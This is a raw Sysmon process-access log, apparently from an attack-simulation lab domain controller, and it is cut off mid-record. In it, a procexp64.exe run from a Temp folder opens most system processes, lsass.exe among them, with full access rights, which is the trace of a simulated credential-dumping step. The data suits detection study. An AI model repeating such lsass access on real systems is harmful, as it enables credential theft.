15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.127{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.112{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3227-6010-BFA2-00000000A301}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-1517-600B-0500-00000000A301}6402208C:\Windows\system32\csrss.exe{732C744F-3227-6010-BFA2-00000000A301}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.455{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3227-6010-BFA2-00000000A301}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 